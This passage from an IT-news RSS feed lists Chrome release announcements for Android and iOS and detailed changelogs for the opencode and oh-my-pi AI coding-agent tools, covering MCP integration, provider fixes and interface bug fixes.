<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Dev 151 (151.0.7910.0) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.dev">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7896.3..151.0.7910.0?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D151">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[ Hello Everyone! We've just released Chrome 150 (150.0.7871.46) for Android to a small percentage of users. It'll become available on Google Play over the next few days. You can find more details about early Stable releases here.This release includes stability and performance improvements. You ca...]]></description>
<link>https://tsecurity.de/de/3622959/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622959/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Thu, 25 Jun 2026 00:08:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p> Hello Everyone! We've just released Chrome 150 (150.0.7871.46) for Android to a small percentage of users. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. You can find more details about early Stable releases <a href="https://developer.chrome.com/blog/early-stable/">here</a>.</p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.197..150.0.7871.46?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.<br><br>Krishna Govind<br><a href="https://www.google.com/chrome/">Google Chrome</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Stable for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Stable 150 (150.0.7871.51) for iOS; it'll become available on App Store in the next few hours.This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know by...]]></description>
<link>https://tsecurity.de/de/3622958/it-security-nachrichten/chrome-stable-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622958/it-security-nachrichten/chrome-stable-for-ios-update/</guid>
<pubDate>Thu, 25 Jun 2026 00:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Stable 150 (150.0.7871.51) for iOS; it'll become available on App Store in the next few hours.</p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.34..150.0.7871.51?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.17.10]]></title>
<description><![CDATA[Core
Improvements

Added MCP server instructions to session context. (@Arcadi4)
Added Opencode-managed provider integration support.
Added MCP resource template listing.
Added MCP resource read tools.
Added a --mini CLI mode.

Bugfixes

Hid MCP resource template tools when access is denied.
Preve...]]></description>
<link>https://tsecurity.de/de/3622822/downloads/v11710/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622822/downloads/v11710/</guid>
<pubDate>Wed, 24 Jun 2026 22:46:18 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Core</h2>
<h3>Improvements</h3>
<ul>
<li>Added MCP server instructions to session context. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Arcadi4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Arcadi4">@Arcadi4</a>)</li>
<li>Added Opencode-managed provider integration support.</li>
<li>Added MCP resource template listing.</li>
<li>Added MCP resource read tools.</li>
<li>Added a <code>--mini</code> CLI mode.</li>
</ul>
<h3>Bugfixes</h3>
<ul>
<li>Hid MCP resource template tools when access is denied.</li>
<li>Prevented MCP resource tools from colliding when servers expose the same keys.</li>
<li>Emitted skill base directories as filesystem paths instead of <code>file://</code> URLs. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shyuan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shyuan">@shyuan</a>)</li>
<li>Restored legacy MCP tool names for existing integrations.</li>
<li>Restored v1 account config loading.</li>
<li>Bound MCP OAuth callbacks to IPv4 loopback for better local auth reliability. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/he-yufeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/he-yufeng">@he-yufeng</a>)</li>
<li>Preserved structured error details in surfaced failures.</li>
<li>Fixed snapshots from subdirectories so they only include the right files and paths.</li>
<li>Fixed ACP resource text sourcing on Windows and other cross-platform path cases.</li>
<li>Preserved file source paths in ACP resource text.</li>
<li>Waited for plugins before loading reference-backed config and system context.</li>
<li>Hid <code>gpt-5.5-pro</code> when using Codex OAuth.</li>
</ul>
<h2>TUI</h2>
<h3>Improvements</h3>
<ul>
<li>Added a configurable keybind to open the diff viewer.</li>
<li>Added diff viewer support for comparing against the main branch.</li>
</ul>
<h3>Bugfixes</h3>
<ul>
<li>Prevented worker rejections from breaking the TUI process.</li>
</ul>
<h2>Desktop</h2>
<h3>Improvements</h3>
<ul>
<li>Kept draft prompt state per tab.</li>
<li>Added a new session progress indicator. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>)</li>
<li>Added mobile bottom navigation.</li>
<li>Added collapsible server sections. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>)</li>
<li>Added server-aware session routes to keep same-session navigation separated across servers.</li>
</ul>
<h3>Bugfixes</h3>
<ul>
<li>Always applied safe-area insets.</li>
<li>Made session navigation more stable and faster.</li>
<li>Routed new sessions through tabs correctly.</li>
<li>Cleared viewed session notifications reliably.</li>
<li>Scoped drafts created from Home to the right server and project.</li>
<li>Throttled directory tree loading.</li>
<li>Persisted drafts and prompt state more reliably.</li>
<li>Improved iOS PWA shell behavior.</li>
<li>Refined the mobile session layout.</li>
<li>Added the server button dropdown. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>)</li>
<li>Restored review line comments.</li>
<li>Improved the mobile home layout.</li>
</ul>
<h2>SDK</h2>
<h3>Improvements</h3>
<ul>
<li>Exposed provider integration IDs in the SDK.</li>
</ul>
<h2>Extensions</h2>
<h3>Improvements</h3>
<ul>
<li>Added namespaced plugin hook APIs.</li>
<li>Added the V2 plugin API for Effect and Promise plugins.</li>
</ul>
<p><strong>Thank you to 6 community contributors:</strong></p>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/remorses/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/remorses">@remorses</a>:
<ul>
<li>feat(llm): add video and audio media support to Gemini protocol (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4640720284" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/31889" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/31889/hovercard" href="https://github.com/anomalyco/opencode/pull/31889">#31889</a>)</li>
</ul>
</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>:
<ul>
<li>feat(app): collapsible servers (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718004331" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/33384" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/33384/hovercard" href="https://github.com/anomalyco/opencode/pull/33384">#33384</a>)</li>
<li>fix(app): add server button dropdown (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716400444" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/33358" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/33358/hovercard" href="https://github.com/anomalyco/opencode/pull/33358">#33358</a>)</li>
<li>feat(app): new session progress indicator (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4681784058" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/32662" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/32662/hovercard" href="https://github.com/anomalyco/opencode/pull/32662">#32662</a>)</li>
<li>feat(app): update all components to use v2 tokens (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731815552" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/33598" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/33598/hovercard" href="https://github.com/anomalyco/opencode/pull/33598">#33598</a>)</li>
</ul>
</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ReStranger/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ReStranger">@ReStranger</a>:
<ul>
<li>fix: Skip bun version check for nix version (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4708833648" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/33166" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/33166/hovercard" href="https://github.com/anomalyco/opencode/pull/33166">#33166</a>)</li>
</ul>
</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/he-yufeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/he-yufeng">@he-yufeng</a>:
<ul>
<li>fix(mcp): bind oauth callback to IPv4 loopback (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4555694721" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/30022" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/30022/hovercard" href="https://github.com/anomalyco/opencode/pull/30022">#30022</a>)</li>
</ul>
</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shyuan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shyuan">@shyuan</a>:
<ul>
<li>fix(skill): emit base directory as filesystem path, not file:// URL (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731282241" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/33580" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/33580/hovercard" href="https://github.com/anomalyco/opencode/pull/33580">#33580</a>)</li>
</ul>
</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Arcadi4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Arcadi4">@Arcadi4</a>:
<ul>
<li>feat(mcp): append server instructions to context (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4670105149" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/32490" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/32490/hovercard" href="https://github.com/anomalyco/opencode/pull/32490">#32490</a>)</li>
</ul>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 150 (150.0.7871.52) for iOS; it'll become available on App Store in the next few days.You can see a partial list of the changes in the Git log. If you find a new issue, please let us know by filing a bug.Chrome Release TeamGoogle Chrome]]></description>
<link>https://tsecurity.de/de/3622678/it-security-nachrichten/chrome-beta-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622678/it-security-nachrichten/chrome-beta-for-ios-update/</guid>
<pubDate>Wed, 24 Jun 2026 21:53:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 150 (150.0.7871.52) for iOS; it'll become available on App Store in the next few days.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.35..150.0.7871.52?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v16.1.17]]></title>
<description><![CDATA[@oh-my-pi/pi-agent-core
Fixed

Hardened the agent-loop cooperative yield against backward wall-clock jumps. A stale future timestamp left in the shared yield gate (NTP step, or a fake-timer test mocking Date.now) could make yieldIfDue() gate forever and stop yielding to the event loop; the gate n...]]></description>
<link>https://tsecurity.de/de/3622650/tools/v16117/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622650/tools/v16117/</guid>
<pubDate>Wed, 24 Jun 2026 21:38:45 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-agent-core</h2>
<h3>Fixed</h3>
<ul>
<li>Hardened the agent-loop cooperative yield against backward wall-clock jumps. A stale future timestamp left in the shared yield gate (NTP step, or a fake-timer test mocking <code>Date.now</code>) could make <code>yieldIfDue()</code> gate forever and stop yielding to the event loop; the gate now treats a backward clock delta as due and re-anchors. The gate is exposed as an injectable <code>YieldGate</code> (with <code>yieldIfDue()</code> retained as the shared singleton) so it can be exercised without mocking process-global timers.</li>
</ul>
<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Added provider-level <code>notes?: string[]</code> field to <code>UsageReport</code> for disclaimers that apply to every limit (e.g. "OMP-observed spend only"). The field is declared in both the <code>usage.ts</code> schema and the auth-broker wire schema copy so it survives the <code>"+": "reject"</code> deserialization gate. (<a href="https://github.com/can1357/oh-my-pi/issues/3268" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3268/hovercard">#3268</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Moved the OpenCode Go "OMP-observed spend only" disclaimer from per-limit <code>notes</code> to provider-level <code>notes</code>, so it renders once per provider instead of duplicating across every account × window. (<a href="https://github.com/can1357/oh-my-pi/issues/3268" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3268/hovercard">#3268</a>)</li>
<li>Fixed Anthropic rate-limit header usage cache entries retaining legacy missing account metadata after refresh.</li>
<li>Fixed Anthropic-compatible budget-effort models dropping the selected effort before request serialization, so <code>output_config.effort</code> is emitted alongside <code>thinking.budget_tokens</code> when model metadata declares <code>mode: "anthropic-budget-effort"</code>.</li>
<li>Fixed <code>anthropic-messages</code> silently dropping caller-supplied <code>Authorization</code> / <code>X-Api-Key</code> from <code>model.headers</code> and <code>ANTHROPIC_CUSTOM_HEADERS</code>, blocking custom proxy auth schemes. Non-OAuth requests now honor the caller's value (matching <code>openai-responses</code>); the lower-level client also suppresses its <code>X-Api-Key</code> add when a custom <code>Authorization</code> is supplied for a non-official endpoint so the proxy receives a single credential. OAuth bearer + Cloudflare AI Gateway keep their pre-existing enforced auth headers. (<a href="https://github.com/can1357/oh-my-pi/issues/3391" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3391/hovercard">#3391</a>)</li>
<li>Fixed Ollama Cloud <code>num_predict</code> ignoring the provider's 65536 output-token cap so stale <code>models.db</code> rows (or custom <code>modelOverrides</code> re-enabling output caps) that carried <code>maxTokens: 1048576</code> from a pre-omitMaxOutputTokens catalog 400'd every request with <code>max_tokens (1048576) exceeds model's maximum output tokens (65536) for model deepseek-v4-pro</code>. The Ollama provider now clamps <code>num_predict</code> for any <code>ollama-cloud</code> request at the documented 65536 cap before sending, independent of the cached spec's <code>maxTokens</code> and on top of the existing <code>omitMaxOutputTokens</code> policy — so the request stays valid even when the load-time policy never normalized the spec. Self-hosted <code>ollama</code> traffic is unaffected. (<a href="https://github.com/can1357/oh-my-pi/issues/3392" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3392/hovercard">#3392</a>)</li>
<li>Fixed OpenRouter Anthropic models on the Responses path omitting <code>cache_control</code>, so prompt caching engages without forcing Chat Completions. (<a href="https://github.com/can1357/oh-my-pi/issues/3397" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3397/hovercard">#3397</a>)</li>
<li>Fixed OpenRouter Anthropic Responses follow-up requests replaying prior reasoning items with stale signatures, which caused HTTP 400 <code>Invalid signature in thinking block</code> errors after a thinking turn. (<a href="https://github.com/can1357/oh-my-pi/issues/3399" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3399/hovercard">#3399</a>)</li>
<li>Fixed OpenRouter Anthropic models on the Responses path omitting <code>cache_control</code>, so prompt caching engages without forcing Chat Completions. <code>cacheRetention: "long"</code> now upgrades the breakpoint to <code>ttl: "1h"</code>. (<a href="https://github.com/can1357/oh-my-pi/issues/3397" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3397/hovercard">#3397</a>)</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed the Umans GLM-5.2 thinking-level picker collapsing to a single <code>high</code> tier after dynamic discovery: the <code>max</code> upstream level now resolves to the internal <code>xhigh</code> effort, the picker shows both <code>high</code> and <code>xhigh</code>, and the metadata maps <code>xhigh</code> back to Umans's native <code>max</code> wire tier. (<a href="https://github.com/can1357/oh-my-pi/issues/3192" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3192/hovercard">#3192</a>)</li>
<li>Fixed GitHub Copilot business and enterprise endpoints accepting image inputs that they reject with <code>400 vision is not supported</code>. The Copilot <code>/models</code> response advertises <code>capabilities.supports.vision = true</code> for Claude/GPT chat models on every host, but only the canonical personal endpoint (<code>https://api.githubcopilot.com</code>) actually serves them; <code>githubCopilotModelManagerOptions</code> now forces <code>input: ["text"]</code> whenever discovery resolves to a non-personal base URL, and <code>mergeDynamicModel</code> honours the dynamic value (instead of OR-upgrading) when the merged endpoint differs from the bundled reference. (<a href="https://github.com/can1357/oh-my-pi/issues/3387" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3387/hovercard">#3387</a>)</li>
<li>Fixed OpenRouter Anthropic compat to strip Responses reasoning history during replay so signed thinking blocks are not sent back to routed Anthropic providers. (<a href="https://github.com/can1357/oh-my-pi/issues/3399" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3399/hovercard">#3399</a>)</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed mnemopi auto-retain extracting facts/entities from assistant-authored transcript turns. <code>MnemopiSessionState.retainMessages</code> still stores the full multi-role window for episodic recall, but passes only user-authored turns as <code>extractText</code>, so assistant prose containing <code>always</code>/<code>never</code> no longer becomes durable user <code>Instruction:</code> memory. (<a href="https://github.com/can1357/oh-my-pi/issues/3372" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3372/hovercard">#3372</a>)</li>
<li>Fixed lazy tool auto-downloads hanging when <code>Bun.write(dest, response)</code> receives a streaming <code>fetch()</code> <code>Response</code>; tool assets now stream the response body to disk with the existing download abort signal and remove partial files on abort. (<a href="https://github.com/can1357/oh-my-pi/issues/3369" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3369/hovercard">#3369</a>)</li>
<li>Fixed profile-alias installer producing backslash-separated paths for bash/zsh/fish config files on Windows. <code>path.join</code> was used unconditionally, producing Windows-style paths that POSIX shells can't resolve. The installer now uses <code>path.posix.join</code> for non-Windows platforms and normalizes script paths to forward slashes for POSIX shell alias blocks, so <code>omp --alias</code> works correctly in Git Bash and WSL.</li>
<li>Fixed pasted or dragged non-image file paths in the TUI prompt staying as inert raw text; existing files now attach as clean <code>local://attachment-N.&lt;ext&gt;</code> references while image paths keep the image attachment flow. (<a href="https://github.com/can1357/oh-my-pi/issues/3360" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3360/hovercard">#3360</a>)</li>
<li>Slash commands are now recorded in input history (Up Arrow recall). Previously only 4 commands (<code>/plan</code>, <code>/goal</code>, <code>/mcp</code>, <code>/ssh</code>) stored their text; all other built-in slash commands were silently skipped because <code>executeBuiltinSlashCommand</code> returned <code>true</code> before <code>addToHistory</code> was called. History is now centralized in the input controller after successful command dispatch. Commands that may carry secrets (<code>/login &lt;url&gt;</code> with OAuth callback params, <code>/mcp add --token &lt;token&gt;</code>) are excluded from history to prevent credential leakage (<a href="https://github.com/can1357/oh-my-pi/issues/3148" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3148/hovercard">#3148</a>)</li>
<li>Fixed the <code>ask</code> tool's "Other (type your own)" free-text editor (prompt-style <code>HookEditorComponent</code>) ignoring Ctrl+Q and Ctrl+Enter, so Windows Terminal users who learned the <code>app.message.followUp</code> chord from the main editor (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4594434621" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1903" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1903/hovercard" href="https://github.com/can1357/oh-my-pi/issues/1903">#1903</a> / fixed by <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4594461651" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1905" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1905/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1905">#1905</a>) got zero feedback on submit. The hook-style and main-editor surfaces honored <code>matchesAppFollowUp</code>; the prompt-style handler did not, leaving plain Enter as the sole submit path and Ctrl+Enter falling through to Editor as a newline (silently swallowed by WT). <code>#handlePromptStyleInput</code> now checks <code>matchesAppFollowUp</code> first — mirroring <code>#handleHookStyleInput</code> — and the hint reads <code>enter or ctrl+q submit</code> so the chord is discoverable. (<a href="https://github.com/can1357/oh-my-pi/issues/3353" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3353/hovercard">#3353</a>)</li>
<li>Fixed the TUI freezing when a tool approval prompt fires while <code>/settings</code> (or the Extensions/Agents dashboard) is open. The fullscreen overlay's close handler restored focus to the editor it had captured at open time, but <code>ExtensionUiController</code> had since swapped the editor out of the editor slot for the approval prompt — so on exit the visible prompt sat unreachable while keystrokes routed to the now-unmounted editor (no Enter/Up/Down/Esc response, only Ctrl+C escaped). <code>SelectorController</code> now restores focus to whatever currently owns the editor slot via a <code>focusActiveEditorArea()</code> helper, applied to settings, extensions dashboard, and agents dashboard close paths. (<a href="https://github.com/can1357/oh-my-pi/issues/3349" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3349/hovercard">#3349</a>)</li>
<li>Fixed <code>/settings</code> coercing enum/text values to display strings before handing them to the TUI list, preventing YAML numeric enum values from reaching native truncation (<a href="https://github.com/can1357/oh-my-pi/issues/3338" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3338/hovercard">#3338</a>).</li>
<li>Fixed all extension loading silently failing on the cross-compiled <code>omp-darwin-arm64</code> release binary (downloaded directly or via a Homebrew tap wrapper) because <code>__computeBunfsPackageRoot</code> mis-handled <code>import.meta.dir = "//root/omp-darwin-arm64"</code>. Bun 1.3.14 reports <code>&lt;bunfs-root&gt;/&lt;binary-name&gt;</code> for the compiled entry's <code>import.meta.dir</code>, but the pre-fix function joined <code>metaDir + "packages"</code> and produced <code>/root/omp-darwin-arm64/packages</code> — the binary basename was baked into every bunfs path, so the TypeBox/legacy-pi shims and every <code>@oh-my-pi/pi-*</code> package-root override failed <code>existsSync</code> validation and <code>resolveCanonicalPiSpecifier</code> fell through to a bunfs <code>Bun.resolveSync</code> that also could not find the module. The function now detects the bunfs-root + binary-basename shape (<code>path.basename(path.dirname(metaDir)) === "root"</code>) and strips the trailing binary segment by slicing the original <code>metaDir</code>; the production bunfs shim join path also preserves Bun's bunfs-native <code>//root</code> / <code>B:\~BUN\root</code> prefix that <code>path.join</code> would otherwise collapse. (<a href="https://github.com/can1357/oh-my-pi/issues/3329" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3329/hovercard">#3329</a>)</li>
<li>Fixed llama.cpp discovery to prefer per-model <code>/v1/models</code> <code>meta.n_ctx</code>/<code>meta.n_ctx_train</code> values, refresh selected models after lazy load, and bypass fresh-cache reuse so server restarts update context windows. (<a href="https://github.com/can1357/oh-my-pi/issues/3310" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3310/hovercard">#3310</a>)</li>
<li>Fixed <code>task.maxConcurrency: 0</code> serializing subagent spawns instead of running them unbounded. The settings UI labels <code>0</code> as "Unlimited", but the session-scoped spawn <code>Semaphore</code> clamped <code>max</code> via <code>Math.max(1, max)</code>, so the second subagent body in a batch always waited for the first to release the seat. The constructor now treats <code>max &lt;= 0</code> (and any non-finite input) as unbounded via <code>Number.POSITIVE_INFINITY</code>, matching the eval <code>parallel()</code>/<code>pipeline()</code> worker-pool semantics (<a href="https://github.com/can1357/oh-my-pi/issues/3305" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3305/hovercard">#3305</a>).</li>
<li>Fixed MCP tool calls forwarding empty optional placeholder arguments (<code>""</code> and <code>{}</code>) to <code>tools/call</code>; optional placeholders are now omitted while required fields and meaningful falsy values are preserved. (<a href="https://github.com/can1357/oh-my-pi/issues/3302" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3302/hovercard">#3302</a>)</li>
<li>Fixed the welcome <code>Tip:</code> line rendering with hardcoded <code>#b48cff</code> / <code>#9ccfff</code> pastels plus a manual <code>\x1b[2m</code> dim, so any light theme dropped the body to ~1.5:1 contrast (well under WCAG AA). <code>renderWelcomeTip</code> in <code>packages/coding-agent/src/modes/components/welcome.ts</code> now paints the label through <code>theme.fg("customMessageLabel", …)</code> and the body through <code>theme.fg("muted", …)</code> (no manual dim), so the line tracks the active theme and stays legible on light backgrounds. (<a href="https://github.com/can1357/oh-my-pi/issues/3337" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3337/hovercard">#3337</a>)</li>
<li>Fixed <code>omp usage</code> and the <code>/usage</code> command duplicating provider-wide disclaimer notes (e.g. OpenCode Go's "OMP-observed spend only") once per account × limit window. Provider-level notes now render once above the per-account sections in the TUI, CLI, and ACP render paths, and identical per-limit notes are deduplicated in the TUI aggregate renderer. (<a href="https://github.com/can1357/oh-my-pi/issues/3268" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3268/hovercard">#3268</a>)</li>
<li>Fixed the welcome panel advertising <code>? for keyboard shortcuts</code> after the <code>?</code> shortcut was deliberately removed (commit <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/can1357/oh-my-pi/commit/dcf482c4c458e325e5482b607441ebd1eca5b9d9/hovercard" href="https://github.com/can1357/oh-my-pi/commit/dcf482c4c458e325e5482b607441ebd1eca5b9d9"><tt>dcf482c</tt></a>). The tips section now points users at <code>/hotkeys</code> instead. (<a href="https://github.com/can1357/oh-my-pi/issues/1614" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1614/hovercard">#1614</a>)</li>
<li>Fixed Devin provider models silently producing empty responses under the default <code>defaultThinkingLevel: auto</code>. Devin models advertise <code>reasoning: true</code> but no <code>thinking.efforts</code> (Cascade selects effort by routing to sibling model ids, not a wire param), so <code>getSupportedEfforts(model)</code> was empty; <code>clampAutoThinkingEffort</code> returned the classifier-picked effort as-is, which then tripped <code>requireSupportedEffort</code> in <code>pi-ai/stream.ts</code> with <code>Thinking effort low is not supported by devin/&lt;id&gt;. Supported efforts: </code> (silently swallowed by the TUI). <code>clampAutoThinkingEffort</code> now returns <code>undefined</code> when the model has no controllable effort surface, matching <code>clampThinkingLevelForModel</code>; the auto-thinking turn hook also short-circuits the classifier call for these models. (<a href="https://github.com/can1357/oh-my-pi/issues/3356" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3356/hovercard">#3356</a>)</li>
<li>Fixed <code>omp tiny-models download</code> exiting before its unref'd worker subprocess could install the runtime or download model weights. The tiny-model client now references the worker while requests are pending so standalone CLI downloads wait for <code>Downloaded ...</code> / <code>Failed ...</code> completion. (<a href="https://github.com/can1357/oh-my-pi/issues/3291" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3291/hovercard">#3291</a>)</li>
